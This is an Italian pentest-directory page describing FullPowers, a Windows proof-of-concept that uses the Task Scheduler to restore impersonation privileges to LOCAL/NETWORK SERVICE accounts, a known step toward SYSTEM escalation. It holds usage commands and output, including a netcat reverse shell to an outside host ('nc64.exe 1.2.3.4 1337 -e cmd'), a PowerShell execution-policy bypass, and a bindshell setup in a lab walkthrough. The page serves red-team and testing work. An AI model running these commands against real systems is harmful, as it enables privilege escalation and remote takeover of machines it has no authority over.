Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
FullPowers — Recupera l'insieme di privilegi predefinito di un account LOCAL/NETWORK SERVICE | Kitploit
Strumenti/GitHubGitHub/itm4n/fullpowers
Escalation di PrivilegiExploitPost-ExploitPenetration TestingRed TeamingArchived
GitHubitm4n/fullpowers

FullPowers

Recupera l'insieme di privilegi predefinito di un account LOCAL/NETWORK SERVICE

Vedi Repository
7001026 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Sito web

FullPowers

FullPowers è uno strumento Proof-of-Concept che ho realizzato per recuperare automaticamente il set di privilegi predefinito di un account di servizio, inclusi SeAssignPrimaryToken e SeImpersonate.

Motivazione

Su Windows, alcuni servizi eseguiti come LOCAL SERVICE o NETWORK SERVICE sono configurati per funzionare con un set di privilegi ristretto. Di conseguenza, anche se il servizio viene compromesso, non si ottengono i privilegi di impersonificazione d'oro e l'elevazione dei privilegi a LOCAL SYSTEM dovrebbe essere più complicata. Tuttavia, ho scoperto che, quando si crea un'attività pianificata, il nuovo processo creato dal Servizio Utilità di pianificazione ha tutti i privilegi predefiniti dell'account utente associato (eccetto SeImpersonate). Pertanto, con alcune manipolazioni dei token, è possibile generare un nuovo processo con tutti i privilegi mancanti.

Per maggiori informazioni: https://itm4n.github.io/localservice-privileges/

Utilizzo

⚠️ Questo strumento deve essere eseguito solo come LOCAL SERVICE o NETWORK SERVICE.

Puoi controllare il messaggio di aiuto usando l'opzione -h.

root@kitploit:~
c:\TOOLS>FullPowers -h

FullPowers v0.1 (by @itm4n)

  This tool leverages the Task Scheduler to recover the default privilege set of a service account.
  For more information: https://itm4n.github.io/localservice-privileges/

Optional arguments:
  -v              Verbose mode, used for debugging essentially
  -c <CMD>        Custom command line to execute (default is 'C:\Windows\System32\cmd.exe')
  -x              Try to get the extended set of privileges (might fail with NETWORK SERVICE)
  -z              Non-interactive, create a new process and exit (default is 'interact with the new process')

Esempio 1, utilizzo base

root@kitploit:~
c:\TOOLS>FullPowers
[+] Successfully created scheduled task. PID=9976
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 10.0.19041.84]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>

Esempio 2, specificare una riga di comando personalizzata

root@kitploit:~
c:\TOOLS>FullPowers -c "powershell -ep Bypass"
[+] Successfully created scheduled task. PID=9028
[+] CreateProcessAsUser() OK
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Try the new cross-platform PowerShell https://aka.ms/pscore6

PS C:\WINDOWS\system32> Get-ExecutionPolicy
Bypass

Esempio 3, avviare una reverse shell netcat e uscire

root@kitploit:~
c:\TOOLS>FullPowers -c "C:\TOOLS\nc64.exe 1.2.3.4 1337 -e cmd" -z
[+] Successfully created scheduled task. PID=5482
[+] CreateProcessAsUser() OK

Come fare

Vuoi testare questo PoC da solo? Ottimo! Ecco alcune semplici istruzioni per iniziare.

L'idea generale è avviare una bindshell dal processo di un servizio esistente, connettersi ad essa e poi eseguire l'eseguibile.

  1. Avrai bisogno di 2 strumenti di terze parti, netcat e RunFromProcess.
  2. Scegli un servizio che ha privilegi limitati, ad esempio: upnphost.
  3. Apri il Task Manager, vai alla scheda Servizi e ottieni il PID del processo corrispondente.
  4. Usa il seguente comando per avviare la bindshell come amministratore:
root@kitploit:~
C:\TOOLS>RunFromProcess-x64.exe <PID> C:\TOOLS\nc64.exe -l -p 9001 -e cmd
  1. Usa il seguente comando per connetterti alla bindshell:
root@kitploit:~
C:\TOOLS>nc64.exe 127.0.0.1 9001
Microsoft Windows [Version 10.0.19041.84]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>whoami
nt authority\local service

C:\WINDOWS\system32>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name          Description              State
======================= ======================== =======
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeCreateGlobalPrivilege Create global objects    Enabled
  1. Possiamo vedere che il processo corrente non ha privilegi di impersonificazione. Ora esegui il PoC...
root@kitploit:~
c:\TOOLS>FullPowers
[+] Started dummy thread with id 5568
[+] Successfully created scheduled task.
[+] Got new token! Privilege count: 7
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 10.0.19041.84]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>whoami
nt authority\local service

C:\WINDOWS\system32>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= =======
SeAssignPrimaryTokenPrivilege Replace a process level token             Enabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Enabled
SeAuditPrivilege              Generate security audits                  Enabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Enabled

Ora dovresti avere una shell con privilegi di impersonificazione!

Scarica lo strumento